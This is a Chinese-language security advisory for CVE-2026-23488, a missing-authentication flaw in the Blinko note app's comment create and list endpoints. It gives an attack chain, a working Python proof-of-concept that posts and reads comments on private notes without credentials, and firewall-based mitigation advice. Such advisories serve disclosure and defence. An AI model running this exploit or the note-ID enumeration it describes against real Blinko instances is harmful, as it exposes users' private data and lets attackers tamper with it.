CVE-2026-23488 Blinko未授权访问漏洞

漏洞信息

漏洞编号

CVE-2026-23488

漏洞类型

访问控制失效

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Blinko

漏洞概述

Blinko是一款AI驱动的卡片笔记项目。在1.8.4版本之前，其`/api/v1/comment/create`和`/api/v1/comment/list`接口存在未授权访问漏洞。攻击者无需身份认证即可对任意笔记（包括私有笔记）发布评论，或查看笔记下的所有评论。该漏洞可能导致敏感信息泄露或数据被恶意篡改，目前已于1.8.4版本中修复。

技术细节

该漏洞源于Blinko后端在处理评论相关的API请求时，缺乏严格的身份验证和权限校验机制。具体而言，`/api/v1/comment/create`接口在接收创建评论的请求时，未验证用户是否已登录，也未检查用户是否有权限访问目标笔记（即未验证笔记的归属权或公开状态）。攻击者可以通过构造特定的HTTP POST请求，修改请求参数中的`note_id`，直接向私有笔记发送恶意评论。同样，`/api/v1/comment/list`接口允许未授权用户获取任意笔记的评论列表，导致信息泄露。由于CVSS向量显示无需用户交互（UI:N）且无需权限（PR:N），攻击者可通过网络远程发起攻击。利用此漏洞，攻击者可以编写脚本遍历系统中的笔记ID，批量窃取用户隐私数据或进行垃圾评论攻击，破坏系统的完整性和机密性。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点正在运行Blinko应用，并确定其版本低于1.8.4。

STEP 2

漏洞探测

攻击者向`/api/v1/comment/list`端点发送GET请求，携带特定的私有笔记ID，且不携带任何认证Cookie或Token。

STEP 3

数据泄露

由于权限校验缺失，服务器返回了该私有笔记下的所有评论内容，导致信息泄露。

STEP 4

恶意操作

攻击者进一步利用`/api/v1/comment/create`端点发送POST请求，向私有笔记中写入垃圾信息或恶意链接。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url, note_id):
    """
    Proof of Concept for CVE-2026-23488
    Tests unauthorized comment creation and listing.
    """
    # Endpoint for creating comments
    create_url = f"{target_url}/api/v1/comment/create"
    # Endpoint for listing comments
    list_url = f"{target_url}/api/v1/comment/list"

    headers = {
        "Content-Type": "application/json",
        # Note: No Authorization/Cookie header is sent to exploit the vulnerability
    }

    # Attempt to create a comment on a private note without auth
    payload_create = {
        "noteId": note_id,
        "content": "Unauthorized comment via CVE-2026-23488"
    }
    
    try:
        response = requests.post(create_url, json=payload_create, headers=headers, timeout=5)
        if response.status_code == 200 or response.status_code == 201:
            print(f"[+] Vulnerability Confirmed: Successfully created comment on Note ID {note_id}")
            print(f"    Response: {response.text}")
        else:
            print(f"[-] Failed to create comment. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error during comment creation: {e}")

    # Attempt to list comments on a private note without auth
    params_list = {
        "noteId": note_id
    }

    try:
        response = requests.get(list_url, params=params_list, headers=headers, timeout=5)
        if response.status_code == 200:
            print(f"[+] Vulnerability Confirmed: Successfully listed comments for Note ID {note_id}")
            print(f"    Data: {response.text}")
        else:
            print(f"[-] Failed to list comments. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error during comment listing: {e}")

if __name__ == "__main__":
    # Replace with actual target and a valid note ID
    target = "http://localhost:3000"
    target_note_id = 1
    check_vulnerability(target, target_note_id)

影响范围

Blinko < 1.8.4

防御指南

临时缓解措施

如果无法立即升级，建议管理员在网络边界（如WAF或防火墙）配置规则，暂时阻断对`/api/v1/comment/create`和`/api/v1/comment/list`接口的外部访问，或要求接口调用必须包含有效的身份验证头。同时，应审计系统日志，检查是否已有未授权的评论操作发生。